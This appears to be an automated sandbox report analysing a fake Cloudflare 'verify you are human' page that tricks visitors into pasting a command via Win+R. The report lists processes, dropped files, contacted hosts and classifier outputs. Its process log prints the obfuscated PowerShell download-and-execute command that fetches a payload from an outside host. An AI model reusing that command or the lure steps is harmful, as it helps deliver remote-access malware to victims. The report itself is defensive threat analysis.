Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1115
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8767
Source: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe	Window / User API: threadDelayed 412
Source: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe	Window / User API: threadDelayed 8074

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\HzYATQ\pcicapi.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\HzYATQ\PCICL32.DLL	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\HzYATQ\HTCTL32.DLL	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\HzYATQ\msvcr100.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\HzYATQ\PCICHEK.DLL	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\HzYATQ\TCCTL32.DLL	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\HzYATQ\remcmdstub.exe	Jump to dropped file

Source: C:\Windows\System32\svchost.exe TID: 3524	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8128	Thread sleep count: 1115 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8128	Thread sleep count: 8767 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8172	Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe TID: 7644	Thread sleep count: 239 > 30
Source: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe TID: 7644	Thread sleep time: -59750s >= -30000s
Source: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe TID: 7648	Thread sleep count: 412 > 30
Source: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe TID: 7648	Thread sleep time: -41200s >= -30000s
Source: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe TID: 7644	Thread sleep count: 8074 > 30
Source: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe TID: 7644	Thread sleep time: -2018500s >= -30000s

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Source: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''https://thecopycat.biz/o/o.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC\|I`E`X
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\ipconfig.exe "C:\Windows\system32\ipconfig.exe" /flushdns
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c attrib +h C:\Users\user\AppData\Roaming\HzYATQ
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +h C:\Users\user\AppData\Roaming\HzYATQ
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe "C:\Users\user\AppData\Roaming\HzYATQ\client32.exe"

Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $c1='%%(n%%ew-o%%%bje%%%ct n%%%et.w%%%e'; $c4='b%%cl%%%%ie%%nt%%).%%%d%%%ow%nl%%o%%'; $c3='a%%dst%%%%ri%%%%%n%%%g(''https://thecopycat.biz/o/o.png'')';$tc=($c1,$c4,$c3 -join '');$tc=$tc.replace('%','');i`e`x $tc\|i`e`x
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $c1='%%(n%%ew-o%%%bje%%%ct n%%%et.w%%%e'; $c4='b%%cl%%%%ie%%nt%%).%%%d%%%ow%nl%%o%%'; $c3='a%%dst%%%%ri%%%%%n%%%g(''https://thecopycat.biz/o/o.png'')';$tc=($c1,$c4,$c3 -join '');$tc=$tc.replace('%','');i`e`x $tc\|i`e`x

Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Windows\System32\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Source: Yara match	File source: C:\Users\user\AppData\Roaming\HzYATQ\PCICHEK.DLL, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\HzYATQ\pcicapi.dll, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\HzYATQ\HTCTL32.DLL, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\HzYATQ\client32.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\HzYATQ\TCCTL32.DLL, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\HzYATQ\PCICL32.DLL, type: DROPPED
Source: Yara match	File source: 00000013.00000000.1798242317.000000000075F000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000000.1798242317.0000000000752000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2445421109.000000006C620000.00000002.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2432544549.00000000026A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2427181578.0000000000752000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2441539518.00000000111E1000.00000004.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2440967241.0000000011193000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 Browser Extensions	11 Process Injection	11 Masquerading	OS Credential Dumping	2 Security Software Discovery	Remote Services	1 Email Collection	1 Data Obfuscation	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Command and Scripting Interpreter	11 Registry Run Keys / Startup Folder	11 Registry Run Keys / Startup Folder	41 Virtualization/Sandbox Evasion	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	Data from Removable Media	2 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 PowerShell	1 DLL Side-Loading	1 DLL Side-Loading	11 Process Injection	Security Account Manager	41 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	11 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 Extra Window Memory Injection	1 DLL Side-Loading	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Extra Window Memory Injection	LSA Secrets	1 System Network Configuration Discovery	SSH	Keylogging	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	Steganography	Cached Domain Credentials	2 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	33 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Source	Detection	Scanner
C:\Users\user\AppData\Roaming\HzYATQ\HTCTL32.DLL	3%	ReversingLabs
C:\Users\user\AppData\Roaming\HzYATQ\PCICHEK.DLL	3%	ReversingLabs
C:\Users\user\AppData\Roaming\HzYATQ\msvcr100.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\HzYATQ\pcicapi.dll	3%	ReversingLabs
C:\Users\user\AppData\Roaming\HzYATQ\PCICL32.DLL	12%	ReversingLabs
C:\Users\user\AppData\Roaming\HzYATQ\TCCTL32.DLL	3%	ReversingLabs
C:\Users\user\AppData\Roaming\HzYATQ\client32.exe	13%	ReversingLabs
C:\Users\user\AppData\Roaming\HzYATQ\remcmdstub.exe	12%	ReversingLabs

Name	IP	Active	Malicious	Reputation
geo.netsupportsoftware.com	104.26.0.231	true	false	unknown
webdemo.biz	166.1.160.75	true	true	unknown
thecopycat.biz	166.1.160.211	true	true	unknown
www.google.com	142.250.186.68	true	false	unknown
i.ibb.co	162.19.58.159	true	false	unknown
use.fontawesome.com	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Reputation
http://92.255.85.135/fakeurl.htm	true	unknown
https://webdemo.biz/	true	unknown
http://geo.netsupportsoftware.com/location/loca.asp	true	unknown
http://thecopycat.biz/o/1.png	true	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
142.250.186.68	www.google.com	United States	15169	GOOGLEUS	false
142.250.186.67	unknown	United States	15169	GOOGLEUS	false
1.1.1.1	unknown	Australia	13335	CLOUDFLARENETUS	false
142.251.5.84	unknown	United States	15169	GOOGLEUS	false
166.1.160.211	thecopycat.biz	United States	11798	ACEDATACENTERS-AS-1US	true
162.19.58.159	i.ibb.co	United States	209	CENTURYLINK-US-LEGACY-QWESTUS	false
216.58.206.46	unknown	United States	15169	GOOGLEUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
104.21.27.152	unknown	United States	13335	CLOUDFLARENETUS	false
92.255.85.135	unknown	Russian Federation	42097	SOVTEL-ASRU	true
166.1.160.75	webdemo.biz	United States	11798	ACEDATACENTERS-AS-1US	true
172.217.23.100	unknown	United States	15169	GOOGLEUS	false
142.250.184.238	unknown	United States	15169	GOOGLEUS	false
184.28.90.27	unknown	United States	16625	AKAMAI-ASUS	false
104.26.0.231	geo.netsupportsoftware.com	United States	13335	CLOUDFLARENETUS	false
142.250.186.99	unknown	United States	15169	GOOGLEUS	false

Private

IP
192.168.2.16
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1545769
Start date and time:	2024-10-31 00:14:32 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsinteractivecookbook.jbs
Sample URL:	https://webdemo.biz/
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	22
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	EGA enabled
Analysis Mode:	stream
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.phis.troj.win@30/30@17/165

Warnings

Exclude process from analysis (whitelisted): svchost.exe
Excluded IPs from analysis (whitelisted): 142.250.186.67, 142.251.5.84, 142.250.184.238, 34.104.35.123, 104.21.27.152, 172.67.142.245
Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, edgedl.me.gvt1.com, clientservices.googleapis.com, clients.l.google.com, use.fontawesome.com.cdn.cloudflare.net
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: https://webdemo.biz/

LLM Input / Output

Input	Output
URL: Model: claude-3-5-sonnet-latest	{ "typosquatting": false, "unusual_query_string": false, "suspicious_tld": true, "ip_in_url": false, "long_subdomain": false, "malicious_keywords": false, "encoded_characters": false, "redirection": false, "contains_email_address": false, "known_domain": false, "brand_spoofing_attempt": false, "third_party_hosting": false }
URL: URL: https://webdemo.biz
URL: https://webdemo.biz/ Model: claude-3-haiku-20240307	```json { "contains_trigger_text": true, "trigger_text": "Verify you are human by completing the action below.", "prominent_button_name": "Verify you are human", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": true, "has_urgent_text": false, "has_visible_qrcode": false }

URL: https://webdemo.biz/ Model: claude-3-haiku-20240307	```json { "brands": [ "CloudFlare" ] }
	```json { "brands": [ "CloudFlare" ] }
URL: https://webdemo.biz/ Model: gpt-4o	```json{ "legit_domain": "cloudflare.com", "classification": "wellknown", "reasons": [ "The brand 'CloudFlare' is well-known and typically associated with the domain 'cloudflare.com'.", "The provided URL 'webdemo.biz' does not match the legitimate domain for CloudFlare.", "The domain 'webdemo.biz' is generic and does not have any direct association with CloudFlare.", "The use of a '.biz' domain extension is unusual for a well-known brand like CloudFlare, which typically uses '.com'.", "The input fields 'u, n, k, n, o, w, n' do not provide any clear context or association with CloudFlare services." ], "riskscore": 8} Google indexed: False
URL: webdemo.biz Brands: CloudFlare Input Fields: u, n, k, n, o, w, n
URL: https://webdemo.biz/ Model: claude-3-haiku-20240307	```json { "contains_trigger_text": true, "trigger_text": "Verification Steps", "prominent_button_name": "VERIFY", "text_input_field_labels": [ "Press & hold the Windows Key R", "In the verification window, press Ctrl + V", "Press Enter on your keyboard to finish" ], "pdf_icon_visible": false, "has_visible_captcha": true, "has_urgent_text": false, "has_visible_qrcode": false }

URL: https://webdemo.biz/ Model: claude-3-haiku-20240307	```json { "brands": [ "CloudFlare" ] }
	```json { "brands": [ "CloudFlare" ] }

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.8169154189322582
Encrypted:	false
SSDEEP:
MD5:	7BA984407EE4D26E1219DAD36B5733D2
SHA1:	7B633A883B2498D7D87A47885D5436490C31DC77
SHA-256:	5E1AF915D5E0CE2B1902344FEB5C8E970CC209A326E35DA80B0B50CA5A2FDB9D
SHA-512:	5B64A43110C7AA6EDAE2CF4609FA08A23E82E1195954CFEB682EBE173EA30A39E651EEBEFA7A9188FBD35E9CB7467B004EB495D58CE707ABCF4271A679A2FE61
Malicious:	false
Reputation:	unknown
Preview:	..6.........@..@.....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................................d6d6.#.........`h.................h.......6.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.08163589367896706
Encrypted:	false
SSDEEP:
MD5:	04A110F08218D37AC9095BE4EDBC1E64
SHA1:	D2071090D6A931523FBCDD890AA3D2250E52CEA5
SHA-256:	3DC5AB990259872F2741EC8760587084338B56A05CE792EBAF7231494C8F3404
SHA-512:	BB26709870F665FE22FE16CA47B2CAD010EB38919467FB52FF82B206F7936430683A13DAB364B007B7989C528D500E8DFC1A95EDA46E65E137D21AB0485E209A
Malicious:	false
Reputation:	unknown
Preview:	...$.....................................;...{.......\|E.. ...{........... ...{... ...{..#.#.. ...{.\|................P..z.....\|E.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\33CUD2J1\loca[1].htm

Download File

Process:	C:\Users\user\AppData\Roaming\HzYATQ\client32.exe
File Type:	ASCII text, with no line terminators
Category:	modified
Size (bytes):	15
Entropy (8bit):	2.7329145639793984
Encrypted:	false
SSDEEP:
MD5:	8AB0D91EF06123198FFAC30AD08A14C7
SHA1:	46D83BB84F74D8F28427314C6084CC9AFE9D1533
SHA-256:	DB50064FEE42FB57DCFD9C4269A682331246224D6108A18DB83ABD400CCECA12
SHA-512:	1AA8560708AD663C4D5D0C2199E2CE472D11748EDA18848AAA3430C6F333BB04DA65DFFF4144BFEEA3860CA30F7F832EC64FF6D5B0731AC8878050601AC7A3A3
Malicious:	false
Reputation:	unknown
Preview:	32.7767,-96.797

